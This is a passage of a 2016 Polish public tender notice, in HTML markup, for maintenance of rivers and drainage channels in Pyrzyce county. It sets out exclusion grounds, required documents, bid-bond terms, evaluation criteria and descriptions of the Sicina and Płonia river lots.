                <br />
                Informacje dodatkowe:
                </div><b>
                III.2) PODSTAWY WYKLUCZENIA
              </b><br /><div style="padding-left: 20px"><b>III.2.1) Podstawy wykluczenia określone w art. 24 ust. 1  ustawy Pzp</b><br /><b>III.2.2) Zamawiający przewiduje wykluczenie wykonawcy na podstawie art. 24 ust. 5 ustawy Pzp</b>
                  tak
                  <br />
                  Zamawiający przewiduje następujące fakultatywne podstawy wykluczenia:
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 1 ustawy Pzp)
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 2 ustawy Pzp)
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 3 ustawy Pzp)
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 4 ustawy Pzp)
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 8 ustawy Pzp)
                <br /></div><b>
                III.3) WYKAZ OŚWIADCZEŃ SKŁADANYCH PRZEZ WYKONAWCĘ W CELU WSTĘPNEGO POTWIERDZENIA, ŻE NIE PODLEGA ON WYKLUCZENIU ORAZ SPEŁNIA WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ SPEŁNIA KRYTERIA SELEKCJI
              </b><br /><div style="padding-left: 20px"><b>
                  Oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu
                </b><br />
                  tak
                <br /><b>
                  Oświadczenie o spełnianiu kryteriów selekcji
                </b><br />
                  tak
                </div><b>
                III.4) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW , SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 3 USTAWY PZP:
              </b><br /><div style="padding-left: 20px">1) Aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu potwierdzenia braku podstaw do wykluczenia w oparciu o art. 24 ust. 5 pkt 1 ustawy.
2) Aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzającego, że Wykonawca nie zalega z opłacaniem podatków, lub innego dokumentu potwierdzającego że wykonawca zawarł porozumienie z właściwym organem podatkowym w sprawie spłat tych należności wraz z ewentualnymi odsetkami lub grzywnami w szczególności, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawionego nie wcześniej niż 3 miesiące przed upływem terminu składania ofert. 
3) Aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że Wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub innego dokumentu  potwierdzającego  że wykonawca zawarł porozumienie z właściwym organem w sprawie spłat tych należności wraz z ewentualnymi odsetkami lub grzywnami w szczególności  uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawionego nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.

W przypadku wspólnego ubiegania się o zamówienie publiczne (składania oferty przez wspólników spółki cywilnej)  dokumenty wymienione w pkt od 1  3  muszą być złożone oddzielnie dla każdego ze wspólników oraz dla spółki cywilnej.

Uwaga!
Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu na zasoby innych podmiotów (podwykonawców), które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu (podwykonawcy) w zakresie wymaganym dla wykonawcy w Rozdziale III, B pkt 1-3.
</div><b>
                III.5) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 1 USTAWY PZP
              </b><br /><div style="padding-left: 20px"><b>III.5.1) W ZAKRESIE SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU:</b><br />a) wykaz usług wskazanych w rozdziale III, część I, pkt 2.A, potwierdzający spełnienie warunku określonego w tym rozdziale, wykonanych w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy- w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dowodów potwierdzających, że usługi te zostały wykonane należycie - zgodnie z załącznikiem Nr 6 do SIWZ.

Do wykazu (załącznik nr 6 do SIWZ) należy dołączyć dowody, że usługi zostały wykonane należycie. 
Dowodami, o których mowa w sekcji C. lit a są:
   -  referencje bądź inne dokumenty wystawione przez podmiot na rzecz, którego usługi zostały wykonywane,
   - oświadczenie wykonawcy jeżeli z uzasadnionych przyczyn o obiektywnym charakterze Wykonawca nie jest w stanie uzyskać w/w wymienionych dokumentów.

b) oświadczenie na temat wykształcenia i kwalifikacji zawodowych wykonawcy odpowiednie do stanowisk, jakie zostaną jej powierzone tj.: osobą legitymującą się wykształceniem wyższym o kierunku biologia lub ochrona środowiska lub pokrewne i doświadczeniem, tj. sprawowaniem co najmniej jednego nadzoru przyrodniczego rozumianego jako kontrola nad sposobem i terminem realizacji działań odpowiadających rodzajowi działań objętych przedmiotem zamówienia lub wykonaniem monitoringu przyrodniczego lub inwentaryzacji przyrodniczej związanej z realizacją inwestycji z zakresu budownictwa wodno-melioracyjnego  sporządzony według załącznika nr 10 do SIWZ.

c) wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za kierowanie pracami, wraz z informacjami na temat ich kwalifikacji zawodowych i doświadczenia, niezbędnych do wykonania zamówienia oraz informacją o podstawie do dysponowania tymi osobami  zgodnie z załącznikiem nr 9 do SIWZ.
d) wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia wraz z informacjami na temat ich wykształcenia, kwalifikacji zawodowych i doświadczenia, niezbędnych do wykonania zamówienia oraz informacją o podstawie do dysponowania tymi osobami  zgodnie z załącznikiem nr 12 do SIWZ.
e) dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na sumę gwarancyjną nie mniejsza niż dla zadań częściowych:
nr 1  Pyrzyce I 200.000,00 zł brutto (dwieście tysięcy złotych i 00/100)
nr 2  Pyrzyce II 50.000,00 zł brutto (pięćdziesiąt tysięcy złotych i 00/100)
nr 3  Pyrzyce III 50.000,00 zł brutto (pięćdziesiąt tysięcy złotych i 00/100)

Jeżeli wykaz, oświadczenia  lub inne złożone przez Wykonawcę dokumenty  budzą  wątpliwości Zamawiającego może on zwrócić się bezpośrednio do właściwego podmiotu, na rzecz którego usługi  były wykonane, o  dodatkowe  informacje  lub dokumenty w tym zakresie.

Zamawiający może, na każdym etapie postępowania, uznać że wykonawca nie posiada wymaganych zdolności, jeżeli zaangażowanie zasobów technicznych lub zawodowych wykonawcy w inne przedsięwzięcia gospodarcze wykonawcy może mieć negatywny wpływ na realizację zamówienia.  
<br /><b>III.5.2) W ZAKRESIE KRYTERIÓW SELEKCJI:</b><br /></div><b>
                III.6) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 2 USTAWY PZP
              </b><br /><div style="padding-left: 20px"></div><b>
                III.7) INNE DOKUMENTY NIE WYMIENIONE W pkt III.3) - III.6)
              </b><div style="padding-left: 20px">1. WYPEŁNIONY  FORMULARZ  OFERTOWY  sporządzony na/wg  Załącznika  nr 1 do SIWZ;
2. W przypadku wniesienia WADIUM w formie innej niż pieniężna należy dołączyć dokument potwierdzający wniesienie wadium  do oferty); na każdą część osobno.
3. Jeżeli oferta nie zostanie podpisana przez Wykonawcę do oferty należy dołączyć PEŁNOMOCNICTWO(A) do działania w imieniu Wykonawcy (podpisanie oferty, reprezentowanie Wykonawcy, ewentualnie inne działania np. podpisanie umowy)  - o ile umocowanie(a) osoby(ób) występującej(cych) w imieniu Wykonawcy nie wynikają z innych złożonych  dokumentów.
4. ZOBOWIĄZANIE PODMIOTU/OSOBY udostępniającego(ej) Wykonawcy swoje zasoby sporządzone wg Załącznika nr 2c do SIWZ (wypełniają tylko podmioty, które udostępniają Wykonawcy swoje zasoby). Zobowiązanie należy dołączyć do w oryginale do oferty (jeżeli występuje);
5. OŚWIADCZENIE  WYKONAWCY sporządzone na/wg załącznika nr 2d lub 2e do SIWZ o przynależności albo braku przynależności do tej samej grupy kapitałowej. 
6. Kosztorys ofertowy sporządzony zgodnie z wymaganiami Zamawiającego określonymi w części XI SIWZ na każde zadanie częściowe.

Uwaga!
   
1. Na podstawie art. 24 ust 11 ustawy oświadczenie o którym mowa w sekcji D pkt 5 Wykonawca  przekazuje Zamawiającemu w terminie 3 dni od zamieszczenia przez zamawiającego na stronie internetowej informacji dotyczących: kwoty, jaką zamierza przeznaczyć na sfinansowanie zamówienia, firm oraz adresów wykonawców, którzy złożyli oferty w terminie, ceny, terminu wykonania zamówienia, okresów gwarancji i warunków płatności zawartych w ofertach.
2. Wraz ze złożeniem oświadczenia, Wykonawca może przedstawić dowody (dokumenty lub informacje), że powiązania z innym wykonawcą nie prowadzą do zakłócenia konkurencji w postępowaniu o udzielenie zamówienia.
</div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA IV: PROCEDURA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>IV.1) OPIS </b><br /><b>IV.1.1) Tryb udzielenia zamówienia: </b>
                przetarg nieograniczony
              <br /><b>IV.1.2) Zamawiający żąda wniesienia wadium:</b><div style="padding-left: 20px">
                  tak,
                  <br />
                  Informacja na temat wadium
                  <br />1. WADIUM
1.	Wadium na poszczególne części zamówienia ustala się na kwotę:
5.000,00 dla zadania częściowego nr 1  Pyrzyce I 
1.000,00 dla zadania częściowego nr 2  Pyrzyce II 
1.000,00 dla zadania częściowego nr 3  Pyrzyce III
2.	
2. Wadium należy wnieść przed upływem terminu składania ofert, tj. do dnia 15.09.2016r. do godz. 12:00. W przypadku wniesienia wadium w formie pieniężnej, za moment wniesienia wadium uznaje się moment uznania rachunku bankowego Zamawiającego.
3. Wadium może być wniesione w formach określonych w art. 45 ust. 6 ustawy, tj.:
 1) pieniądzu;
    2) poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo - kredytowej, z tym, że poręczenie kasy jest zawsze poręczeniem pieniężnym;
 3) gwarancjach bankowych;
 4) gwarancjach ubezpieczeniowych;
 5) poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2
ustawy z dnia 9 listopada 2000r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości Dz. U. z 2016, poz. 359 z późn. zm.).
4. Wadium w formie pieniężnej należy wnieść przelewem na rachunek bankowy Zamawiającego w : 
PKO BP S.A. I Oddział w Szczecinie
nr: 34 1020 4795 0000 9002 0122 0631.
z adnotacją: WADIUM  przetarg ozn NP/NE/333/45 - nr części /2016
1.	Dowód wniesienia wadium należy dołączyć do oferty.
2.	W przypadku wniesienia wadium w formie innej niż pieniężna  oryginał dokumentu potwierdzającego wniesienie wadium należy zdeponować w siedzibie Zamawiającego w Szczecinie, al. Wyzwolenia 105, przed upływem terminu składania ofert.
3.	Wadium wniesione w innej formie niż pieniężna musi obejmować odpowiedzialność za wszystkie przypadki powodujące utratę wadium przez Wykonawcę, określone w art. 46 ust. 4a i ust. 5 ustawy.
4.	Wykonawca, który nie zabezpieczy oferty akceptowalną formą wadium zgodnie z zapisami ustawy zostanie wykluczony z prowadzonego postępowania, a jego oferta zostanie odrzucona.
5.	Zamawiający dokona zwrotu lub zatrzymania wadium zgodnie z art. 46 ustawy.

UWAGA! 
Stosownie do zapisów art. 46 ust. 4a ustawy Zamawiający Zatrzymuje wadium wraz z odsetkami, jeżeli Wykonawca w odpowiedzi na wezwanie, o którym mowa w art. 26 ust. 3 i 3a, z przyczyn   leżących po jego stronie, nie złoży  oświadczeń lub dokumentów, potwierdzających okoliczności o których mowa w art. 25 ust 1 oświadczenia o którym mowa w art. 25a ust 1, pełnomocnictw lub nie wyrazi zgody na poprawienie omyłki  o której mowa w art. 87 ust. 2 pkt 3, co spowoduje brak możliwości wybrania oferty złożonej przez wykonawcę jako najkorzystniejszej.   
</div><br /><b>IV.1.3) Przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b><div style="padding-left: 20px">
                  nie
                </div><br /><b>
                IV.1.4) Wymaga się złożenia ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /></div><br /><b>
                IV.1.5.) Wymaga się złożenia oferty wariantowej:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie oferty wariantowej
                <br />
                  nie
                <br />
                Złożenie oferty wariantowej dopuszcza się tylko z jednoczesnym złożeniem oferty zasadniczej:
                <br />
                  nie
                </div><br /><b>
                IV.1.6) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu
              </b><br /><i>
                (przetarg ograniczony, negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne)
              </i><div style="padding-left: 20px">
                Liczba wykonawców  <br />
                Przewidywana minimalna liczba wykonawców  <br />
                Maksymalna liczba wykonawców  <br />
                Kryteria selekcji wykonawców:
                <br /></div><br /><b>
                IV.1.7) Informacje na temat umowy ramowej lub dynamicznego systemu zakupów:
              </b><div style="padding-left: 20px">
                Umowa ramowa będzie zawarta:
                <br /><br />
                Czy przewiduje się ograniczenie liczby uczestników umowy ramowej:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                Zamówienie obejmuje ustanowienie dynamicznego systemu zakupów:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                W ramach umowy ramowej/dynamicznego systemu zakupów dopuszcza się złożenie ofert w formie katalogów elektronicznych:
                <br />
                  nie
                <br />
                Przewiduje się pobranie ze złożonych katalogów elektronicznych informacji potrzebnych do sporządzenia ofert w ramach umowy ramowej/dynamicznego systemu zakupów:
                <br />
                  nie
                </div><br /><b>IV.1.8) Aukcja elektroniczna </b><br /><b>
                Przewidziane jest przeprowadzenie aukcji elektronicznej </b><i>(przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem) </i>
                nie
              <br /><b>Należy wskazać elementy, których wartości będą przedmiotem aukcji elektronicznej: </b><br /><b>Przewiduje się ograniczenia co do przedstawionych wartości, wynikające z opisu przedmiotu zamówienia:</b><br />
                nie
              <br />

              
                Należy podać, które informacje zostaną udostępnione wykonawcom w trakcie aukcji elektronicznej oraz jaki będzie  termin ich udostępnienia:
              
              <br />
              Informacje dotyczące przebiegu aukcji elektronicznej: 
              <br />
              Jaki jest przewidziany sposób postępowania w toku aukcji elektronicznej i jakie będą warunki, na jakich wykonawcy będą mogli licytować (minimalne wysokości postąpień): 
              <br />
              Informacje dotyczące wykorzystywanego sprzętu elektronicznego, rozwiązań i specyfikacji technicznych w zakresie połączeń:
              <br />
              Wymagania dotyczące rejestracji i identyfikacji wykonawców w aukcji elektronicznej: 
              <br />


              Informacje o liczbie etapów aukcji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Aukcja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Czy wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu:
                
                  nie
                <br />
                Warunki zamknięcia aukcji elektronicznej:
                <br /></div><br /><b>IV.2) KRYTERIA OCENY OFERT </b><br /><b>IV.2.1) Kryteria oceny ofert: </b><br /><b>IV.2.2) Kryteria</b><br /><div style="padding-left: 20px"><table><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>cena</td><td>60</td></tr><tr><td>termin</td><td>20</td></tr><tr><td>termin rękojmi</td><td>20</td></tr></table></div><br /><b>IV.2.3) Zastosowanie procedury, o której mowa w art. 24aa ust. 1 ustawy Pzp </b>(przetarg nieograniczony)
              <br />
                tak
              <br /><b>IV.3) Negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne </b><br /><b>IV.3.1) Informacje na temat negocjacji z ogłoszeniem</b><br />
              Minimalne wymagania, które muszą spełniać wszystkie oferty:
              <br /><br />
              Przewidziane jest zastrzeżenie prawa do udzielenia zamówienia na podstawie ofert wstępnych bez przeprowadzenia negocjacji
              
                nie
              <br />
              Przewidziany jest podział negocjacji na etapy w celu ograniczenia liczby ofert:
              
                nie
              <br />
              Należy podać informacje na temat etapów negocjacji (w tym liczbę etapów):
              <br /><br />
              Informacje dodatkowe
              <br /><br /><br /><b>IV.3.2) Informacje na temat dialogu konkurencyjnego</b><br />
              Opis potrzeb i wymagań zamawiającego lub informacja o sposobie uzyskania tego opisu:
              <br /><br />
              Informacja o wysokości nagród dla wykonawców, którzy podczas dialogu konkurencyjnego przedstawili rozwiązania stanowiące podstawę do składania ofert, jeżeli zamawiający przewiduje nagrody:
              <br /><br />
              Wstępny harmonogram postępowania:
              <br /><br />
              Podział dialogu na etapy w celu ograniczenia liczby rozwiązań:
              
                nie
              <br />
              Należy podać informacje na temat etapów dialogu:
              <br /><br /><br />
              Informacje dodatkowe:
              <br /><br /><b>IV.3.3) Informacje na temat partnerstwa innowacyjnego</b><br />
              Elementy opisu przedmiotu zamówienia definiujące minimalne wymagania, którym muszą odpowiadać wszystkie oferty:
              <br /><br />
              Podział negocjacji na etapy w celu ograniczeniu liczby ofert podlegających negocjacjom poprzez zastosowanie kryteriów oceny ofert wskazanych w specyfikacji istotnych warunków zamówienia:
              <br />
                nie
              <br />
              Informacje dodatkowe:
              <br /><br /><b>IV.4) Licytacja elektroniczna  </b><br />
              Adres strony internetowej, na której będzie prowadzona licytacja elektroniczna:
              <br /><div style="padding-left: 20px"></div>

              Adres strony internetowej, na której jest dostępny opis przedmiotu zamówienia w licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Wymagania dotyczące rejestracji i identyfikacji wykonawców w licytacji elektronicznej, w tym wymagania techniczne urządzeń informatycznych:
              <br /><div style="padding-left: 20px"></div>

              Sposób postępowania w toku licytacji elektronicznej, w tym określenie minimalnych wysokości postąpień:
              <br /><div style="padding-left: 20px"></div>

              Informacje o liczbie etapów licytacji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Licytacja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Wykonawcy, którzy nie złożyli nowych postąpień, zostaną  zakwalifikowani do następnego etapu:
                
                  nie
                </div>

              Termin otwarcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Termin i warunki zamknięcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div><br />
              Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego, albo ogólne warunki umowy, albo wzór umowy:
              <br /><div style="padding-left: 20px"></div><br />
              Wymagania dotyczące zabezpieczenia należytego wykonania umowy: 
              <br /><div style="padding-left: 20px"></div><br />
              Informacje dodatkowe:
              <br /><div style="padding-left: 20px"></div><b>IV.5) ZMIANA UMOWY</b><br /><b>Przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy:</b>
                tak

                <br />
                Należy wskazać zakres, charakter zmian oraz warunki wprowadzenia zmian:
                <br />1. Zakazuje się istotnych zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie, której dokonano wyboru Wykonawcy, z zastrzeżeniem ust. 2, 3 oraz §4 ust. 4.
2. Zamawiający dopuszcza możliwość istotnych zmian postanowień umowy zawartej z Wykonawcą w stosunku do treści oferty w formie aneksu do umowy w zakresie:
1)	zmiany terminu realizacji zamówienia przed jego upływem z przyczyn niezależnych od Wykonawcy wskazanych przez Wykonawcę  a w szczególności przedłużenia terminu realizacji zamówienia na skutek zaistnienia okoliczności uniemożliwiających prowadzenie robót zgodnie    z wymaganiami Zamawiającego, zwłaszcza związanych z wystąpieniem niekorzystnych zjawisk atmosferycznych i hydrologicznych (np. powodzie, gwałtowne burze, inne anomalie klimatyczne.). Wniosek Wykonawcy w tej sprawie wymaga uzasadnienia i udokumentowania oraz akceptacji Zamawiającego,
2)	okoliczności, których nie można było przewidzieć w chwili zawarcia umowy, a zmiany te są warunkiem wykonania umowy lub są korzystne dla Zamawiającego. Wniosek Wykonawcy w tej sprawie wymaga uzasadnienia i udokumentowania oraz akceptacji Zamawiającego.
3)	zmiana  podwykonawcy  wskazanego w ofercie udostępniającego zasoby lub rezygnacja z tego podwykonawcy, pod warunkiem że Wykonawca wykaże Zamawiającemu że proponowany inny podwykonawca lub wykonawca samodzielnie spełnia warunki udziału w postępowaniu w stopniu nie mniejszym niż wymagany w trakcie postępowania,  
4)	powierzenia  podwykonawcy realizacji części zamówienia w sytuacji gdy  Wykonawca w ofercie zobowiązał się samodzielnie realizować zamówienie,
5)	zmiany zakresu rzeczowego robót przewidzianych do realizacji przez Wykonawcę, o którym mowa w § 11 niniejszej umowy.
3. Zamawiający dopuszcza również możliwość istotnych zmian postanowień umowy zawartej                 z Wykonawcą w stosunku do treści oferty w formie aneksu do umowy w zakresie osób  sprawujących bezpośredni nadzór nad realizacją przedmiotu zamówienia (Przedstawiciela Zamawiającego, inspektora prac, Przedstawiciela Wykonawcy) oraz osób sprawujących w imieniu Wykonawcy nadzór przyrodniczy. Wniosek Wykonawcy w sprawie zmiany Przedstawiciela Wykonawcy w tym osób sprawujących nadzór przyrodniczy wymaga uzasadnienia i udokumentowania oraz akceptacji Zamawiającego.
4.Warunkiem zmian, o których mowa w ust. 2 i 3 będzie zaistnienie szczególnych okoliczności, których nie można było przewidzieć w chwili zawarcia umowy.
5. Zamawiający zastrzega prawo zmniejszenia zakresu prac na zadaniu (obiekcie), w trybie i na zasadach określonych w § 4 ust. 4 umowy.
<br /><b>IV.6) INFORMACJE ADMINISTRACYJNE </b><br /><br /><b>IV.6.1) Sposób udostępniania informacji o charakterze poufnym </b><i>(jeżeli dotyczy): </i><br /><br /><b>Środki służące ochronie informacji o charakterze poufnym</b><br /><br /><b>IV.6.2) Termin składania ofert lub wniosków o dopuszczenie do udziału w postępowaniu: </b><br />
              Data: 15/09/2016, godzina: 12:00,
              <br />
              Skrócenie terminu składania wniosków, ze względu na pilną potrzebę udzielenia zamówienia (przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem):
              <br />
                nie
              <br />
              Wskazać powody:
              <br /><br />
              Język lub języki, w jakich mogą być sporządzane oferty lub wnioski o dopuszczenie do udziału w postępowaniu
              <br />&gt;
              <br /><b>IV.6.3) Termin związania ofertą: </b>
                okres w dniach: 30 (od ostatecznego terminu składania ofert)
              <br /><b>IV.6.4) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia:</b>
                nie
              <br /><b>IV.6.5) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, jeżeli środki służące sfinansowaniu zamówień na badania naukowe lub prace rozwojowe, które zamawiający zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia, nie zostały mu przyznane</b>
                nie
              <br /><b>IV.6.6) Informacje dodatkowe:</b><br /></div></div><div class="headerLarge_xforms" style="text-align: center"><u>
                ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH
              </u></div><div><b>Część nr: </b>1
                  
                <b>Nazwa: </b>Rzeka Sicina km 0+000 - 26+908<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>1.2. Miejsce realizacji: 
Województwo zachodniopomorskie, powiat pyrzycki. 
Zadanie częściowe nr 1 - Rzeka Sicina km 0+000 - 26+908; gmina Pyrzyce, Lipiany; obręb Ryszewo, Brzezin, Turze, Pyrzyce, Nowielin, Mielęcin, Mielęcinek, Batowo.
1.3.1 Przedmiotem zamówienia jest wykonanie usług zwanych dalej pracami utrzymaniowymi związanych z utrzymaniem w należytym  stanie technicznym koryt cieków naturalnych i kanałów oraz zlokalizowanych na nich budowli regulacyjnych i urządzeń wodnych stanowiących urządzenia melioracji wodnych podstawowych w celu zapewnienia:
- ochrony przed powodzią, 
- spływu lodu oraz przeciwdziałania powstawaniu niekorzystnych zjawisk lodowych,  
- warunków korzystania z wód w tym utrzymywania zwierciadła wody na poziomie umożliwiającym funkcjonowanie urządzeń wodnych,
- działania urządzeń wodnych, w szczególności ich odpowiedniego stanu technicznego i funkcjonalnego.
Zamówienie obejmuje ponadto sprawowanie nadzoru przyrodniczego, który Wykonawca zapewni przez cały okres realizacji prac, na wszystkich obiektach objętych zamówieniem.
1.3.2 Przewidywane prace utrzymaniowe obejmują:
- wykaszanie roślin z dna oraz brzegów cieków,
- usuwanie roślin pływających i korzeniących się w dnie,
- usuwanie drzew i krzewów porastających dno oraz brzegi,  
- usuwanie przeszkód naturalnych oraz wynikających z działalności człowieka, 
- zasypywanie wyrw w brzegach przez ich zabudowę biologiczną,
- udrażnianie koryt przez usuwanie zatorów utrudniających swobodny przepływ wód oraz usuwanie namułów i rumoszu, 
- remont i konserwację budowli regulacyjnych oraz ubezpieczeń w obrębie tych budowli i urządzeń wodnych,
- rozbiórkę lub modyfikację tam bobrowych oraz zasypywanie nor bobrów w brzegach śródlądowych wód powierzchniowych.
1.3.3 Nadzór przyrodniczy polegał będzie na kontroli i nadzorze nad wykonywanymi pracami utrzymaniowymi w celu zminimalizowania ewentualnych negatywnych skutków oddziaływania prowadzonych prac na środowisko przyrodnicze.
Zakres nadzoru przyrodniczego obejmuje:
- rozpoznanie stanowisk, siedlisk roślin lub zwierząt, miejsc rozmnażania albo czasowego przebywania gatunków chronionych roślin lub zwierząt w granicach obiektu objętego pracami utrzymaniowymi, 
- zaproponowanie działań ochronnych zapobiegających potencjalnym negatywnym skutkom prowadzonych prac,
- kontrola realizacji przez Wykonawcę prac utrzymaniowych, zaleceń ochronnych w przypadku konieczności ich zastosowania,
- sprawozdanie końcowe z przeprowadzonego nadzoru zawierające wyniki prowadzonych obserwacji, opis działań podjętych w celu wyeliminowania potencjalnego, negatywnego wpływu prowadzonych prac na środowisko przyrodnicze, wnioski z podjętych działań oraz ich skuteczność.

Nadzór przyrodniczy prowadzony będzie przez cały okres realizacji prac utrzymaniowych i dokumentowany na kartach nadzoru przyrodniczego  załącznik nr 14 do SIWZ, zawierających opis aktualnie zinwentaryzowanych gatunków chronionych, zalecenia i podjęte działania mające na celu aktywną ochronę gatunków chronionych roślin i zwierząt w trakcie realizowanych prac wraz z dokumentacją fotograficzną stanowisk gatunków chronionych wykonaną przed rozpoczęciem prac, w trakcie i po ich zakończeniu.
Szczegółowe wymagania dotyczące prowadzenia nadzoru przyrodniczego zawarte są w wytycznych wykonania i odbioru prac utrzymaniowych oraz sprawowania nadzoru przyrodniczego - załącznik nr 8 do SIWZ.
<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>77310000-6, 90721800-5,
                    45246000-3,
                    90500000-2,
                    71313000-5<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      data zakończenia: 30/11/2016<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>Cena</td><td>60</td></tr><tr><td>Termin</td><td>20</td></tr><tr><td>Okres rękojmi</td><td>20</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>2
                  
                <b>Nazwa: </b>Rzeka Płonia km 34+165 - 45+210<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>1.2. Miejsce realizacji: 
Województwo zachodniopomorskie, powiat pyrzycki. 
Zadanie częściowe nr 2 - Rzeka Płonia km 34+165 - 45+210; gmina Przelewice, Warnice, Pyrzyce; obręb Wołdowo, Gardziec, Przywodzie, Karsko, Lubiatowo, Zaborsko, Cieszysław, Okunica.
